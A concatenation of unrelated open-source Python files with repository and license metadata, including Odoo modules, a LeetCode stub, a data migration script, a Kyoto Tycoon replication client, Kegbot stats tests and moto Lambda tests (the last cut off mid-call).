# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.models import TransientModel
from openerp import fields
class WebsiteConfigSettings(TransientModel):
_inherit = 'website.config.settings'
compress_html = fields.Boolean(
string='Compress HTML',
related='website_id.compress_html',
help=('Compress HTML Code Output')
)
|
blooparksystems/website
|
website_compress_html/models/res_config.py
|
Python
|
agpl-3.0
| 1,280
|
# coding=utf-8
import unittest
"""114. Flatten Binary Tree to Linked List
https://leetcode.com/problems/flatten-binary-tree-to-linked-list/description/
Given a binary tree, flatten it to a linked list in-place.
For example, given the following tree:
1
/ \
2 5
/ \ \
3 4 6
The flattened tree should look like:
1
\
2
\
3
\
4
\
5
\
6
Similar Questions:
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def flatten(self, root):
"""
:type root: TreeNode
:rtype: void Do not return anything, modify root in-place instead.
"""
def test(self):
pass
if __name__ == "__main__":
unittest.main()
|
openqt/algorithms
|
leetcode/python/lc114-flatten-binary-tree-to-linked-list.py
|
Python
|
gpl-3.0
| 1,001
|
__author__ = 'Leonardo De Macedo'
|
macedoleonardo/WebTesting-Python-Behave
|
pages/__init__.py
|
Python
|
gpl-2.0
| 35
|
"""
Provides queries against the FTS API, fetching JSON and translating it into pandas dataframes.
It unfortunately doesn't show the structure of the returned data explicitly, that's all handled by pandas.
At some point we may want to create dedicated classes for each type of data returned by the API, to do validation etc,
but then we'll also need to implement join logic between these classes.
"""
import pandas as pd
FTS_BASE_URL = 'http://fts.unocha.org/api/v1/'
JSON_SUFFIX = '.json'
def fetch_json_as_dataframe(url):
return pd.read_json(url)
def fetch_json_as_dataframe_with_id(url):
dataframe = fetch_json_as_dataframe(url)
if 'id' in dataframe.columns:
return dataframe.set_index('id')
else:
return dataframe # happens with an empty result
def build_json_url(middle_part):
return FTS_BASE_URL + middle_part + JSON_SUFFIX
def convert_date_columns_from_string_to_timestamp(dataframe, column_names):
for column_name in column_names:
dataframe[column_name] = dataframe[column_name].apply(pd.datetools.parse)
def fetch_sectors_json_as_dataframe():
return fetch_json_as_dataframe_with_id(build_json_url('Sector'))
def fetch_countries_json_as_dataframe():
return fetch_json_as_dataframe_with_id(build_json_url('Country'))
def fetch_organizations_json_as_dataframe():
return fetch_json_as_dataframe_with_id(build_json_url('Organization'))
def fetch_emergencies_json_for_country_as_dataframe(country):
"""
This accepts both names ("Slovakia") and ISO country codes ("SVK")
"""
return fetch_json_as_dataframe_with_id(build_json_url('Emergency/country/' + country))
def fetch_emergencies_json_for_year_as_dataframe(year):
return fetch_json_as_dataframe_with_id(build_json_url('Emergency/year/' + str(year)))
def fetch_appeals_json_as_dataframe_given_url(url):
dataframe = fetch_json_as_dataframe_with_id(url)
convert_date_columns_from_string_to_timestamp(dataframe, ['start_date', 'end_date', 'launch_date'])
return dataframe
def fetch_appeals_json_for_country_as_dataframe(country):
"""
This accepts both names ("Slovakia") and ISO country codes ("SVK")
"""
return fetch_appeals_json_as_dataframe_given_url(build_json_url('Appeal/country/' + country))
def fetch_appeals_json_for_year_as_dataframe(year):
return fetch_appeals_json_as_dataframe_given_url(build_json_url('Appeal/year/' + str(year)))
def fetch_projects_json_for_appeal_as_dataframe(appeal_id):
dataframe = fetch_json_as_dataframe_with_id(build_json_url('Project/appeal/' + str(appeal_id)))
if not dataframe.empty: # guard against empty result
convert_date_columns_from_string_to_timestamp(dataframe, ['end_date', 'last_updated_datetime'])
return dataframe
def fetch_clusters_json_for_appeal_as_dataframe(appeal_id):
# NOTE no id present in this data
return fetch_json_as_dataframe(build_json_url('Cluster/appeal/' + str(appeal_id)))
def fetch_contributions_json_as_dataframe_given_url(url):
dataframe = fetch_json_as_dataframe_with_id(url)
if not dataframe.empty: # guard against empty result
convert_date_columns_from_string_to_timestamp(dataframe, ['decision_date'])
return dataframe
def fetch_contributions_json_for_appeal_as_dataframe(appeal_id):
return fetch_contributions_json_as_dataframe_given_url(build_json_url('Contribution/appeal/' + str(appeal_id)))
def fetch_contributions_json_for_emergency_as_dataframe(emergency_id):
return fetch_contributions_json_as_dataframe_given_url(
build_json_url('Contribution/emergency/' + str(emergency_id)))
def fetch_grouping_type_json_for_appeal_as_dataframe(middle_part, appeal_id, grouping=None, alias=None):
"""
Grouping can be one of:
Donor
Recipient
Sector
Emergency
Appeal
Country
Cluster
Alias is used to name the grouping type column and use it as an index.
"""
url = build_json_url(middle_part) + '?Appeal=' + str(appeal_id)
if grouping:
url += '&GroupBy=' + grouping
# NOTE no id present in this data
raw_dataframe = fetch_json_as_dataframe(url)
# oddly the JSON of interest is nested inside the "grouping" element
processed_frame = pd.DataFrame.from_records(raw_dataframe.grouping.values)
if alias:
processed_frame = processed_frame.rename(columns={'type': alias, 'amount': middle_part})
processed_frame = processed_frame.set_index(alias)
return processed_frame
def fetch_funding_json_for_appeal_as_dataframe(appeal_id, grouping=None, alias=None):
"""
Committed or contributed funds, including carry over from previous years
"""
return fetch_grouping_type_json_for_appeal_as_dataframe("funding", appeal_id, grouping, alias)
def fetch_pledges_json_for_appeal_as_dataframe(appeal_id, grouping=None, alias=None):
"""
Contains uncommitted pledges, not funding that has already processed to commitment or contribution stages
"""
return fetch_grouping_type_json_for_appeal_as_dataframe("pledges", appeal_id, grouping, alias)
if __name__ == "__main__":
# test various fetch commands (requires internet connection)
country = 'Chad'
appeal_id = 942
print fetch_sectors_json_as_dataframe()
print fetch_emergencies_json_for_country_as_dataframe(country)
print fetch_projects_json_for_appeal_as_dataframe(appeal_id)
print fetch_funding_json_for_appeal_as_dataframe(appeal_id)
|
luiscape/fts-collector
|
ckan_loading/fts_queries.py
|
Python
|
unlicense
| 5,501
|
#!/usr/bin/python
import unittest as u
import re, fnmatch, os
rootDir = '../src/'
javaBlacklistFile = '../src/javaswig_blacklist'
pythonBlacklistFile = '../src/pythonswig_blacklist'
nodeBlacklistFile = '../src/nodeswig_blacklist'
class BlacklistConsistency(u.TestCase):
def test_java_blacklist(self):
with open(javaBlacklistFile) as f:
blacklist = [line.rstrip('\r\n') for line in f]
for libraryName in blacklist:
files = os.listdir( os.path.join(rootDir, libraryName))
interfaceFileName = libraryName + ".i"
if interfaceFileName in files:
self.fail("\n" + libraryName + " is in javaswig blacklist.\n" + \
"Remove it from blacklist or remove " + \
interfaceFileName + " from sources.")
def test_python_blacklist(self):
with open(pythonBlacklistFile) as f:
blacklist = [line.rstrip('\r\n') for line in f]
for libraryName in blacklist:
files = os.listdir( os.path.join(rootDir, libraryName))
interfaceFileName = "pyupm_" + libraryName + ".i"
if interfaceFileName in files:
self.fail("\n" + libraryName + " is in pythonswig blacklist.\n" + \
"Remove it from blacklist or remove " + \
interfaceFileName + " from sources.")
def test_node_blacklist(self):
with open(nodeBlacklistFile) as f:
blacklist = [line.rstrip('\r\n') for line in f]
for libraryName in blacklist:
files = os.listdir( os.path.join(rootDir, libraryName))
interfaceFileName = "jsupm_" + libraryName + ".i"
if interfaceFileName in files:
self.fail("\n" + libraryName + " is in nodeswig blacklist.\n" + \
"Remove it from blacklist or remove " + \
interfaceFileName + " from sources.")
if __name__ == '__main__':
u.main()
|
pylbert/upm
|
tests/check_consistency.py
|
Python
|
mit
| 2,086
|
"""SCons.Tool.g++
Tool-specific initialization for g++.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/g++.py 3842 2008/12/20 22:59:52 scons"
import os.path
import re
import subprocess
import SCons.Tool
import SCons.Util
cplusplus = __import__('c++', globals(), locals(), [])
compilers = ['g++']
def generate(env):
"""Add Builders and construction variables for g++ to an Environment."""
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
cplusplus.generate(env)
env['CXX'] = env.Detect(compilers)
# platform specific settings
if env['PLATFORM'] == 'aix':
env['SHCXXFLAGS'] = SCons.Util.CLVar('$CXXFLAGS -mminimal-toc')
env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 1
env['SHOBJSUFFIX'] = '$OBJSUFFIX'
elif env['PLATFORM'] == 'hpux':
env['SHOBJSUFFIX'] = '.pic.o'
elif env['PLATFORM'] == 'sunos':
env['SHOBJSUFFIX'] = '.pic.o'
# determine compiler version
if env['CXX']:
#pipe = SCons.Action._subproc(env, [env['CXX'], '-dumpversion'],
pipe = SCons.Action._subproc(env, [env['CXX'], '--version'],
stdin = 'devnull',
stderr = 'devnull',
stdout = subprocess.PIPE)
if pipe.wait() != 0: return
# -dumpversion was added in GCC 3.0. As long as we're supporting
# GCC versions older than that, we should use --version and a
# regular expression.
#line = pipe.stdout.read().strip()
#if line:
# env['CXXVERSION'] = line
line = pipe.stdout.readline()
match = re.search(r'[0-9]+(\.[0-9]+)+', line)
if match:
env['CXXVERSION'] = match.group(0)
def exists(env):
return env.Detect(compilers)
|
makinacorpus/mapnik2
|
scons/scons-local-1.2.0/SCons/Tool/g++.py
|
Python
|
lgpl-2.1
| 3,111
|
#! /usr/bin/env python
from skool.utils import *
restore_db()
|
daeatel/skool
|
bin/import_data_backup.py
|
Python
|
mit
| 63
|
import os
os.environ['DJANGO_SETTINGS_MODULE']='solalim.settings'
import sys
sys.path += ["."]
from django import setup
setup()
import json
from floreal.models import *
from collections import defaultdict
FILE_NAME="./floreal-dump-2020-07-21.json"
x = defaultdict(list)
# Sort model elements by model class name
for y in json.load(open(FILE_NAME)):
k = y['model'].split(".")[-1]
x[k].append(y)
phones = { # username -> phone:str
y['fields']['user'][0]: y['fields']['phone']
for y in x['userphones']
}
users = { } # username -> User
# Create missing users
if True:
user_fields = 'password is_superuser username first_name last_name email is_staff is_active date_joined'.split()
print("Migrate users")
for kwargs in x['user']:
f = kwargs['fields']
defaults = {k: f[k] for k in user_fields}
k = f['username']
u, created = User.objects.get_or_create(username=k, defaults=defaults)
print(f" {'-' if created else '+'} {k}")
users[k] = u
phone = phones.get(u.username)
if phone:
UserPhone.objects.get_or_create(user=u, defaults={"phone": phone})
else:
for u in User.objects.all():
users[u.username] = u
global_staff = set(User.objects.filter(is_staff=True))
floreal = next(nw for nw in x['network'] if nw['fields']['name']=='Floreal')
nwid = floreal['pk']
nw, created = Network.objects.get_or_create(name='Floreal', defaults={'auto_validate': False})
nw_staff = {User.objects.get(username=y[0]) for y in floreal['fields']['staff']}
if True:
# Convert floreal subgroups
print("Floreal subgroups")
for kwargs in x['subgroup']:
f = kwargs['fields']
if f['network'] != nwid:
continue
print(f" - {f['name']}")
xtra = User.objects.get(username=f['extra_user'][0])
xtra.is_active=False
xtra.save()
sg = NetworkSubgroup.objects.create(name=f['name'], network=nw)
buyers = {users[y[0]] for y in f['users']}
substaff = {users[y[0]] for y in f['staff']}
for u in buyers | substaff:
if not u.is_active:
continue
nm = NetworkMembership.objects.create(
user=u,
network=nw,
subgroup=sg,
is_buyer=u in buyers,
is_subgroup_staff=u in substaff,
is_staff=u in global_staff
)
# Migrate other, mono-group networks
print("Other networks")
for kwargs in x['network']:
f = kwargs['fields']
if f['name'] == 'Floreal':
continue # Already handled
nw_id=kwargs['pk']
nw, created = Network.objects.get_or_create(
name=f['name'],
auto_validate=f['auto_validate'],
)
if not created:
continue
print(f" - {nw.name}")
(sgf,) = [sg['fields'] for sg in x['subgroup'] if sg['fields']['network'] == nw_id]
buyers = {users[y[0]] for y in sgf['users']}
substaff = {users[y[0]] for y in sgf['staff']}
for u in buyers | substaff | global_staff:
nm = NetworkMembership.objects.create(
user=u,
network=nw,
is_buyer=u in buyers,
is_subgroup_staff=u in substaff,
is_staff=u in global_staff
)
# Migrate deliveries: put product back together with them
print("Index deliveries")
d = {} # dv.id -> fields
for dv in x['delivery']:
d[dv['pk']] = dict(dv['fields'], products=[])
print(f"Index {len(x['products'])} products within deliveries")
for pd in x['product']:
dv = d[pd['fields']['delivery']]
dv['products'].append(pd)
products = {} # old_pd.id -> new_pd.id
for y in d.values():
old_nwid = y['network']
nw_name = next(z['fields']['name'] for z in x['network'] if z['pk']==old_nwid)
nw = Network.objects.get(name=nw_name)
dv=Delivery.objects.create(
name=y['name'],
network=nw,
state=y['state']
)
print(f" - {dv.network.name} / {dv.name}")
for p in y['products']:
kwargs = dict(p['fields'], delivery=dv)
pd = Product.objects.create(**kwargs)
products[p['pk']] = pd.id
# State REGULATING has been suppressed, so now TERMINATED is E instead of F
Delivery.objects.filter(state='F').update(state='E')
# Migrate purchases
if True:
print("Import purchases...")
for y in x['purchase']:
f = y['fields']
Purchase.objects.create(
user=users[f['user'][0]],
product_id=products[f['product']],
quantity=f['quantity']
)
|
fab13n/caracole
|
floreal/migrate-floreal.py
|
Python
|
mit
| 4,586
|
# -*- coding: utf-8 -*-
#
# Copyright 2014, Carlos Rodrigues
#
# Redistribution and use of this source code is licensed under
# the BSD license. See COPYING file for license description.
#
import socket
import struct
import time
from .kt_error import KyotoTycoonException
MB_REPL = 0xb1
MB_SYNC = 0xb0
OP_SET = 0xa1
OP_REMOVE = 0xa2
OP_CLEAR = 0xa5
def _read_varnum(data):
value = 0
for i, byte in enumerate(data):
value = (value << 7) + (byte & 0x7f)
if byte < 0x80:
return (value, data[i+1:])
return (0, data)
def _decode_log_entry(entry_data):
sid, db, db_op = struct.unpack('!HHB', entry_data[:5])
entry = {'sid': sid, 'db': db, 'op': db_op}
if db_op == OP_CLEAR:
return entry
key_size, buf = _read_varnum(bytearray(entry_data[5:]))
if db_op == OP_REMOVE:
entry['key'] = bytes(buf[:key_size])
return entry
if db_op == OP_SET:
value_size, buf = _read_varnum(buf)
entry['key'] = bytes(buf[:key_size])
entry['expires'], = struct.unpack('!Q', b'\x00\x00\x00' + bytes(buf[key_size:key_size+5]))
entry['value'] = bytes(buf[key_size+5:key_size+value_size])
return entry
raise KyotoTycoonException('unsupported database operation [%s]' % hex(db_op))
class KyotoSlave(object):
def __init__(self, sid, host='127.0.0.1', port=1978, timeout=30):
'''Initialize a Kyoto Tycoon replication slave with ID "sid" to the specified master.'''
if not (0 <= sid <= 65535):
raise ValueError('SID must fit in a 16-bit unsigned integer')
self.sid = sid
self.host = host
self.port = port
self.timeout = timeout
def consume(self, timestamp=None):
'''Yield all available transaction log entries starting at "timestamp".'''
self.socket = socket.create_connection((self.host, self.port), self.timeout)
start_ts = int(time.time() if timestamp is None else timestamp) * 10**9
# Ask the server for all available transaction log entries since "start_ts"...
self._write(struct.pack('!BIQH', MB_REPL, 0x00, start_ts, self.sid))
magic, = struct.unpack('B', self._read(1))
if magic != MB_REPL:
raise KyotoTycoonException('bad response [%s]' % hex(magic))
while True:
magic, ts = struct.unpack('!BQ', self._read(9))
if magic == MB_SYNC: # ...the head of the transaction log has been reached.
self._write(struct.pack('B', MB_REPL))
continue
if magic != MB_REPL:
raise KyotoTycoonException('bad response [%s]' % hex(magic))
log_size, = struct.unpack('!I', self._read(4))
entry = _decode_log_entry(self._read(log_size))
if entry['sid'] == self.sid: # ...this must never happen!
raise KyotoTycoonException('bad log entry [sid=%d]' % sid)
yield entry
def close(self):
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
return True
def _write(self, data):
self.socket.sendall(data)
def _read(self, bytecnt):
buf = []
read = 0
while read < bytecnt:
recv = self.socket.recv(bytecnt - read)
if not recv:
raise IOError('no data while reading')
buf.append(recv)
read += len(recv)
return b''.join(buf)
# EOF - kyotoslave.py
|
sapo/python-kyototycoon
|
kyototycoon/kyotoslave.py
|
Python
|
bsd-3-clause
| 3,487
|
# Copyright 2011 Akretion Sébastien BEAU <sebastien.beau@akretion.com>
# Copyright 2013 Camptocamp SA (author: Guewen Baconnier)
# Copyright 2016 Sodexis
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models
class StockMove(models.Model):
_inherit = "stock.move"
def _get_new_picking_values(self):
values = super()._get_new_picking_values()
sale = self.group_id.sale_id
if sale:
values["workflow_process_id"] = sale.workflow_process_id.id
return values
|
OCA/sale-workflow
|
sale_automatic_workflow/models/stock_move.py
|
Python
|
agpl-3.0
| 544
|
from django.test import TransactionTestCase
from django.test.utils import override_settings
from addict import Dict
from . import models
from .testutils import make_datetime
import copy
from pykeg.backend import get_kegbot_backend
@override_settings(KEGBOT_BACKEND="pykeg.core.testutils.TestBackend")
class StatsTestCase(TransactionTestCase):
reset_sequences = True
def setUp(self):
self.backend = get_kegbot_backend()
models.User.objects.create_user("guest")
test_usernames = ("user1", "user2", "user3")
self.users = [
self.backend.create_new_user(name, "%s@example.com" % name) for name in test_usernames
]
self.taps = [
self.backend.create_tap("tap1", "kegboard.flow0", ticks_per_ml=2.2),
self.backend.create_tap("tap2", "kegboard.flow1", ticks_per_ml=2.2),
]
self.keg = self.backend.start_keg(
"kegboard.flow0",
beverage_name="Unknown",
beverage_type="beer",
producer_name="Unknown",
style_name="Unknown",
)
def testStuff(self):
site = models.KegbotSite.get()
stats = site.get_stats()
self.assertEqual(stats, {})
now = make_datetime(2012, 1, 2, 12, 00)
self.maxDiff = None
d = self.backend.record_drink(
"kegboard.flow0", ticks=1, volume_ml=100, username="user1", pour_time=now
)
expected = Dict(
{
"volume_by_year": {"2012": 100.0},
"total_pours": 1,
"has_guest_pour": False,
"greatest_volume_ml": 100.0,
"registered_drinkers": ["user1"],
"volume_by_day_of_week": {"1": 100.0},
"greatest_volume_id": d.id,
"volume_by_drinker": {"user1": 100.0},
"volume_by_session": {"1": 100.0},
"last_drink_id": d.id,
"keg_ids": [d.keg.id],
"sessions_count": 1,
"average_volume_ml": 100.0,
"total_volume_ml": 100.0,
"largest_session": {"session_id": 1, "volume_ml": 100},
}
)
stats = site.get_stats()
self.assertDictEqual(expected, stats)
now = make_datetime(2012, 1, 3, 12, 00)
d = self.backend.record_drink(
"kegboard.flow0", ticks=200, volume_ml=200, username="user2", pour_time=now
)
stats = site.get_stats()
expected.total_pours = 2
expected.greatest_volume_ml = 200.0
expected.greatest_volume_id = d.id
expected.registered_drinkers.append("user2")
expected.volume_by_drinker["user2"] = 200.0
expected.last_drink_id = d.id
expected.average_volume_ml = 150.0
expected.total_volume_ml = 300.0
expected.volume_by_day_of_week["2"] = 200.0
expected.volume_by_year["2012"] = 300.0
expected.sessions_count = 2
expected.volume_by_session = {"1": 100.0, "2": 200.0}
expected.largest_session = {"session_id": 2, "volume_ml": 200.0}
self.assertDictEqual(expected, stats)
d = self.backend.record_drink(
"kegboard.flow0", ticks=300, volume_ml=300, username="user2", pour_time=now
)
stats = site.get_stats()
expected.total_pours = 3
expected.greatest_volume_ml = 300.0
expected.greatest_volume_id = d.id
expected.volume_by_drinker["user2"] = 500.0
expected.last_drink_id = d.id
expected.average_volume_ml = 200.0
expected.total_volume_ml = 600.0
expected.volume_by_day_of_week["2"] = 500.0
expected.volume_by_year["2012"] = 600.0
expected.sessions_count = 2
expected.volume_by_session = {"1": 100.0, "2": 500.0}
expected.largest_session = {"session_id": 2, "volume_ml": 500.0}
self.assertDictEqual(expected, stats)
previous_stats = copy.copy(stats)
d = self.backend.record_drink("kegboard.flow0", ticks=300, volume_ml=300, pour_time=now)
stats = site.get_stats()
self.assertTrue(stats.has_guest_pour)
self.backend.cancel_drink(d)
stats = site.get_stats()
self.assertDictEqual(previous_stats, stats)
def test_cancel_and_reassign(self):
drink_data = [
(100, self.users[0]),
(200, self.users[1]),
(200, self.users[2]),
(500, self.users[0]),
]
drinks = []
now = make_datetime(2012, 1, 2, 12, 00)
for volume_ml, user in drink_data:
d = self.backend.record_drink(
"kegboard.flow0",
ticks=volume_ml,
username=user.username,
volume_ml=volume_ml,
pour_time=now,
)
drinks.append(d)
self.assertEqual(600, self.users[0].get_stats().total_volume_ml)
self.assertEqual(200, self.users[1].get_stats().total_volume_ml)
self.assertEqual(200, self.users[2].get_stats().total_volume_ml)
self.assertEqual(1000, models.KegbotSite.get().get_stats().total_volume_ml)
self.backend.cancel_drink(drinks[0])
self.assertEqual(500, self.users[0].get_stats().total_volume_ml)
self.assertEqual(200, self.users[1].get_stats().total_volume_ml)
self.assertEqual(200, self.users[2].get_stats().total_volume_ml)
self.assertEqual(900, models.KegbotSite.get().get_stats().total_volume_ml)
self.backend.assign_drink(drinks[1], self.users[0])
self.assertEqual(700, self.users[0].get_stats().total_volume_ml)
self.assertEqual({}, self.users[1].get_stats())
self.assertEqual(200, self.users[2].get_stats().total_volume_ml)
self.assertEqual(900, models.KegbotSite.get().get_stats().total_volume_ml)
self.assertEqual(900, drinks[1].session.get_stats().total_volume_ml)
# Start a new session.
now = make_datetime(2013, 1, 2, 12, 00)
for volume_ml, user in drink_data:
d = self.backend.record_drink(
"kegboard.flow0",
ticks=volume_ml,
username=user.username,
volume_ml=volume_ml,
pour_time=now,
)
drinks.append(d)
self.assertEqual(1300, self.users[0].get_stats().total_volume_ml)
self.assertEqual(200, self.users[1].get_stats().total_volume_ml)
self.assertEqual(400, self.users[2].get_stats().total_volume_ml)
self.assertEqual(1900, models.KegbotSite.get().get_stats().total_volume_ml)
self.assertEqual(1000, drinks[-1].session.get_stats().total_volume_ml)
# Delete all stats for some intermediate drinks.
models.Stats.objects.filter(drink=drinks[-1]).delete()
models.Stats.objects.filter(drink=drinks[-2]).delete()
d = self.backend.record_drink(
"kegboard.flow0", ticks=1111, username=user.username, volume_ml=1111, pour_time=now
)
drinks.append(d)
# Intermediate stats are generated.
self.assertEqual(3011, models.KegbotSite.get().get_stats().total_volume_ml)
self.assertEqual(2111, drinks[-1].session.get_stats().total_volume_ml)
def test_timezone_awareness(self):
site = models.KegbotSite.get()
site.timezone = "US/Pacific"
site.save()
drink_data = [
(100, self.users[0]),
(200, self.users[1]),
(200, self.users[2]),
(500, self.users[0]),
]
drinks = []
# 1 AM UTC
now = make_datetime(2012, 1, 2, 1, 0)
for volume_ml, user in drink_data:
d = self.backend.record_drink(
"kegboard.flow0",
ticks=volume_ml,
username=user.username,
volume_ml=volume_ml,
pour_time=now,
)
drinks.append(d)
self.assertEqual("US/Pacific", d.session.timezone)
stats = site.get_stats()
# Assert that stats are recorded for Sunday (day = 0) rather than
# UTC's monday (day = 1).
self.assertEqual({"0": 1000.0}, stats.volume_by_day_of_week)
self.assertEqual(600, self.users[0].get_stats().total_volume_ml)
|
Kegbot/kegbot-server
|
pykeg/core/stats_test.py
|
Python
|
gpl-2.0
| 8,332
|
# coding=utf-8
import boto3
from pxl.sports_apis import form_mlb_string, form_nhl_string, form_nfl_string
from pxl.weather_api import form_weather_string
from pxl.headline_api import form_headline_string
# https://aqy9q7jfavde2.iot.us-west-2.amazonaws.com/things/PXL-CF2016/shadow
def generate_display(params):
"""Takes the params dictionary and returns the appropriate response for iot."""
message_string = ''
mlb_string = form_mlb_string()
nhl_string = form_nhl_string()
nfl_string = form_nfl_string()
weather_string = form_weather_string()
headline_string = form_headline_string()
data_dict = {'mlb': mlb_string, 'nhl': nhl_string, 'nfl': nfl_string, 'weather': weather_string, 'headlines': headline_string}
for key in params:
if params[key] == 'true':
message_string += data_dict[key]
boto_response(message_string)
return message_string
def boto_response(message):
"""Send a new message to the IOT device."""
part_1 = '{ "state": { "desired": { "message_1": "'
part_3 = '" } } }'
final_message = ''.join([part_1, message, part_3])
final_message = final_message.encode('utf-8')
client = boto3.client('iot-data', region_name='us-west-2')
response = client.update_thing_shadow(
thingName='PXL-CF2016',
payload=final_message
)
|
PXL-CF2016/pxl-master-server
|
pxl/board_iot.py
|
Python
|
mit
| 1,345
|
import base64
import botocore.client
import boto3
import io
import json
import pytest
import sure # noqa # pylint: disable=unused-import
import zipfile
from moto import (
mock_lambda,
mock_ec2,
settings,
)
from uuid import uuid4
from unittest import SkipTest
from .utilities import (
get_role_name,
get_test_zip_file_error,
get_test_zip_file1,
get_zip_with_multiple_files,
get_test_zip_file2,
get_lambda_using_environment_port,
get_lambda_using_network_mode,
get_test_zip_largeresponse,
)
_lambda_region = "us-west-2"
boto3.setup_default_session(region_name=_lambda_region)
@pytest.mark.network
@mock_lambda
def test_invoke_function_that_throws_error():
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file_error()},
)
failure_response = conn.invoke(
FunctionName=function_name, Payload=json.dumps({}), LogType="Tail"
)
failure_response.should.have.key("FunctionError").being.equal("Handled")
payload = failure_response["Payload"].read().decode("utf-8")
payload = json.loads(payload)
payload["errorType"].should.equal("Exception")
payload["errorMessage"].should.equal("I failed!")
payload.should.have.key("stackTrace")
logs = base64.b64decode(failure_response["LogResult"]).decode("utf-8")
logs.should.contain("START RequestId:")
logs.should.contain("I failed!: Exception")
logs.should.contain("Traceback (most recent call last):")
logs.should.contain("END RequestId:")
@pytest.mark.network
@pytest.mark.parametrize("invocation_type", [None, "RequestResponse"])
@pytest.mark.parametrize("key", ["FunctionName", "FunctionArn"])
@mock_lambda
def test_invoke_requestresponse_function(invocation_type, key):
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
fxn = conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file1()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
name_or_arn = fxn[key]
# Only add invocation-type keyword-argument when provided, otherwise the request
# fails to be validated
kw = {}
if invocation_type:
kw["InvocationType"] = invocation_type
in_data = {"msg": "So long and thanks for all the fish"}
success_result = conn.invoke(
FunctionName=name_or_arn, Payload=json.dumps(in_data), LogType="Tail", **kw
)
if "FunctionError" in success_result:
assert False, success_result["Payload"].read().decode("utf-8")
success_result["StatusCode"].should.equal(200)
success_result["ResponseMetadata"]["HTTPHeaders"]["content-type"].should.equal(
"application/json"
)
logs = base64.b64decode(success_result["LogResult"]).decode("utf-8")
logs.should.contain("START RequestId:")
logs.should.contain("custom log event")
logs.should.contain("END RequestId:")
payload = success_result["Payload"].read().decode("utf-8")
json.loads(payload).should.equal(in_data)
# Logs should not be returned by default, only when the LogType-param is supplied
success_result = conn.invoke(
FunctionName=name_or_arn, Payload=json.dumps(in_data), **kw
)
success_result["StatusCode"].should.equal(200)
success_result["ResponseMetadata"]["HTTPHeaders"]["content-type"].should.equal(
"application/json"
)
assert "LogResult" not in success_result
@pytest.mark.network
@mock_lambda
def test_invoke_event_function():
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file1()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
conn.invoke.when.called_with(
FunctionName="notAFunction", InvocationType="Event", Payload="{}"
).should.throw(botocore.client.ClientError)
in_data = {"msg": "So long and thanks for all the fish"}
success_result = conn.invoke(
FunctionName=function_name, InvocationType="Event", Payload=json.dumps(in_data)
)
success_result["StatusCode"].should.equal(202)
json.loads(success_result["Payload"].read().decode("utf-8")).should.equal(in_data)
@pytest.mark.network
@mock_lambda
def test_invoke_lambda_using_environment_port():
if not settings.TEST_SERVER_MODE:
raise SkipTest("Can only test environment variables in server mode")
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python3.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_lambda_using_environment_port()},
)
success_result = conn.invoke(
FunctionName=function_name, InvocationType="Event", Payload="{}"
)
success_result["StatusCode"].should.equal(202)
response = success_result["Payload"].read()
response = json.loads(response.decode("utf-8"))
functions = response["functions"]
function_names = [f["FunctionName"] for f in functions]
function_names.should.contain(function_name)
# Host matches the full URL, so one of:
# http://host.docker.internal:5000
# http://172.0.2.1:5000
# http://172.0.1.1:4555
response["host"].should.match("http://.+:[0-9]{4}")
@pytest.mark.network
@mock_lambda
def test_invoke_lambda_using_networkmode():
"""
Special use case - verify that Lambda can send a request to 'http://localhost'
This is only possible when the `network_mode` is set to host in the Docker args
Test is only run in our CI (for now)
"""
if not settings.moto_network_mode():
raise SkipTest("Can only test this when NETWORK_MODE is specified")
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python3.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_lambda_using_network_mode()},
)
success_result = conn.invoke(
